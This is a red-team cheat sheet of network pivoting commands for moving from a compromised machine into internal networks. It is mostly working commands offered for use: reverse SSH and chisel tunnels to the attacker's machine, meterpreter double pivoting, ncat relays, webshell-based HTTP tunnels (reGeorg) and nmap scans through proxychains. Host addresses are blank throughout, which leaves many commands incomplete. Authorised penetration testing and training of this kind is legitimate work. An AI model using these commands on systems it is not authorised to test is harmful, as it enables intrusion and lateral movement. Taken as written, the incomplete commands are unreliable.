This page will present a serie of commands to pivot through domains during Pentest and Red Team operations.

The structure of this page is highly inspired by the french article Etat de l’art du pivoting réseau en 2019 by Orange Cyberdefense : https://orangecyberdefense.com/fr/insights/blog/ethical_hacking/etat-de-lart-du-pivoting-reseau-en-2019/

This cheatsheet will present the commands described in the article, but without all the explains, only the commands and the essential informations.


Local Port Forwarding

All the request to be transfer to the machine through

ssh user@ssh_server -L [bind_address:]local_port:destination_host:destination_hostport
ssh noraj@ -L -N

Reverse Remote Port Forwarding

ssh user@ssh_server -R [bind_address:]remote_port:destination_host:destination_hostport
  • Get a shell on the pivot machine
  • Launch a ssh server on our machine
  • Create a dedicated account without shell on our machine to limitate the hackback
  • Launch  the reverse from the pivot machine
  • Request to reach
#On our machine
sudo systemctl start sshd
sudo useradd sshpivot --no-create-home --shell /bin/false
sudo passwd sshpivot

#On the pivot machine
ssh sshpivot@ -R -N

Dynamic Port Forwarding

ssh user@ssh_server -D [bind_address:]local_port
ssh noraj@ -D -N

We can request any machines through the proxy

curl --head --proxy socks5://

Reverse remote port forwarding + proxy SOCKS

3 tools can be used :

  • Proxychains
  • Proxychains-ng
  • 3proxy

Proxychains is really good for client side, but not for the server part. Prefer 3proxy, particularly the standalone binary socks.

chmod u+x socks
./socks '-?'
./socks -p10080 -tstop -d
ssh sshpivot@ -R -N

From our machine :

curl --head --proxy socks5://

VPN over SSH

  • With openssh
  • Choose a not present network
    • We create the network
    • Our actual network is
    • Target network :
  • Authorized the tun device forwarding : PermitTunnel yes in /etc/ssh/sshd_config
  • Create a tun interface on the pivot machine and our machine (root is needed)

Solution 1 (not recommended)

Let openssh create the interfaces : root is needed on both machines, risk of hackback

#On our machine
sudo ssh root@ -w any:any

Solution 2 (recommended)

Manual creation and destruction.

On the pivot machine :

sudo ip tuntap add dev tun0 mode tun
sudo ip addr add peer dev tun0
sudo ip link set tun0 up

sudo sysctl net.ipv4.conf.default.forwarding=1

On our machine :

sudo ip tuntap add dev tun0 mode tun
sudo ip addr add peer dev tun0
sudo ip link set tun0 up

ssh noraj@ -w 0:0
#-w permits to specify the interface numbers
Setup NAT on the pivot
sudo iptables -t nat -A POSTROUTING -s -o eth1 -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -s -d -j MASQUERADE
ARP proxy instead of NAT
sudo sysctl net.ipv4.conf.eth0.proxy_arp=1
sudo ip neigh add proxy dev eth0
Setup the route

On our machine

sudo ip route add via

Sshuttle - Transparent proxy over SSH

To forward everything to the network

sshuttle -r noraj@
#With the SSH key
sudo python3 -m sshuttle -v -r --ssh-cmd 'ssh -i id_rsa'

To let sshuttle auto discovered the networks (-x to exclude a network) :

sshuttle -vNr noraj@ -x


Autoroute, proxy socks and local port forwarding

msf5 exploit(multi/handler) > back
msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set SESSION 1
msf5 post(multi/manage/autoroute) > set CMD add
CMD => add
msf5 post(multi/manage/autoroute) > set SUBNET
msf5 post(multi/manage/autoroute) > set NETMASK /24
NETMASK => /24
msf5 post(multi/manage/autoroute) > run

There is a module for Windows to discover some networks with ARP : post/windows/gather/arp_scanner

Then :

use auxiliary/server/socks4a

Prefer socks4 instead of socks5 to limit conflicts with other tools

To use without proxychains : curl --head --proxy socks4a://

Double pivoting

We already have a pivot on a machine, and we gain access to another machine on the internal network. We want to use it in order to pivot to another network :

  • We create a meterpreter payload with the first pivot machine IP as a LHOST value
  • We set a handler on the same IP
  • With the meterpreter session on the second machine, we can add an autoroute to the next network
  • Open a new server SOCKS proxy with a new SRVPORT

Ncat - Reverse remote port forwarding

Use Ncat with the broker mode to accept connections from multiple clients

ncat -lv --broker --max-conns 2

On the pivot machine :

ncat -v 31337 -c 'ncat -v 80'


Local port forwarding

#Pivot machine
chisel server -p 8080 --host -v
#Our machine
chisel client -v

Local port forwarding + SOCKS proxy

#Pivot machine
chisel server -p 8080 --host --socks5 -v
#Our machine
chisel client -v

curl –head –proxy socks5://

Reverse remote port forwarding

#Our machine
chisel server -p 8888 --host --reverse -v
#Pivot machine
chisel client -v R:

Reverse remote port forwarding + proxy SOCKS (auto local port forwarding internal socks proxy)

On our machine :

chisel server -p 8888 --host --reverse -v

Chisel can't be used as a SOCKS proxy server directly :

  • Run a SOCKS server
  • Connect us with a second client
  • Make a local port forwarding to the local Chisel server in order to share the SOCKS proxy server to the first client

On the pivot machine :

chisel client -v R:
chisel server -p 62000 --host --socks5 -v
chisel client -v

To test : curl --head --proxy socks5://

VPN Pivot - VPN Tunnel

Can be found here : https://github.com/0x36/VPNPivot

Same idea as the SSH VPN, but here we will use SSL/TLS

On our machine :

sudo pivots -i tun7 -I -p 28888 -v

On the pivot machine :

sudo sysctl net.ipv4.conf.default.forwarding=1
sudo pivotc 28888

sudo iptables -t nat -A POSTROUTING -s -o eth1 -j MASQUERADE
sudo iptables -t nat -A POSTROUTING -s -d -j MASQUERADE

The project is not maintained now

PivotSuite - multi port forwarding + proxy SOCKS

"Remote" local port forwarding

Forward directly from the pivot machine : no need of a client

pivotsuite -S -F --server-option=PF --forward-ip= --forward-port=80 --server-ip= --server-port=8080
pivotsuite -S -F --server-option=PF --remote-ip= --remote-port=80 --server-ip= --server-port=8080

“Remote” dynamic port forwarding

pivotsuite -S -F --server-option=SP --server-ip= --server-port=8080
#Client side
curl --head --proxy socks5://

Reverse dynamic port forwarding (not recommended)

On our machine :

pivotsuite -S -W --server-ip --server-port 8090

Our server is listenning on all the interfaces, all the ports : everyone can connect to us

On the pivot machine :

pivotsuite -C -O SP --server-ip --server-port 8090

To test : curl --head --proxy socks5:// or curl --head --proxy socks5://

Pivoting behind a NAT

The pivot machine IP is NATed and the machine is, for example, behind a firewall : all the IN ports are closed, but all the OUT ports are open.

We will use the pivot machine as a client, and our machine as a server.

Rpivot - Reverse proxy

Can be found here : https://github.com/klsecservices/rpivot

Server on our machine, client on the pivot :

python2 server.py --server-port 9999 --server-ip --proxy-ip --proxy-port 21000
python2 client.py --server-ip --server-port 9999

#And we use socks4
curl --head --proxy socks4://

In order to simplify the deployment on the pivot machine, we can use a zip archive :

zip rpivot.zip -r *.py ./ntlm_auth/
7z a -r rpivot.zip *.py ./ntlm_auth/

python2 rpivot.zip server --server-port 9999 --server-ip --proxy-ip --proxy-port 21000
python2 rpivot.zip client --server-ip --server-port 9999

Tunna / Fulcrom - HTTP Tunnel

Can be found here : https://github.com/SECFORCE/Tunna

Create a pivot through a webshell with the ports 80 or 443 when they are the only allow.

Instable, not up to date, not really recommended

On the pivot :


On our machine :

python2 reGeorgSocksProxy.py -u -l -p 7777

To bypass the socket restrictions, nosocket version :

python2 reGeorgSocksProxy.py -u -l -p 7777

There is a fork with some improvements (passwords, Python3, etc) : https://github.com/L-codes/Neo-reGeorg

To gererate password on webshell and use it :

python3 neoreg.py generate -k pivotpassword
python3 neoreg.py -k pivotpassword -u

Common tools with SOCKS


Modify /etc/proxychains.conf and :

proxychains curl --head

Nmap through proxychains

To scan 65535 ports at a normal speed :

seq 1 65535 | xargs -P 50 -I port proxychains -q nmap -p port -sT -T4 -oG --open --append-output -Pn -n

To scan multiple machines :

seq 1 254 | xargs -P 50 -I cpt proxychains -q nmap --top-ports 20 -sT -T4 10.42.42.cpt -oG --open --append-output 10.42.42.cpt -Pn -n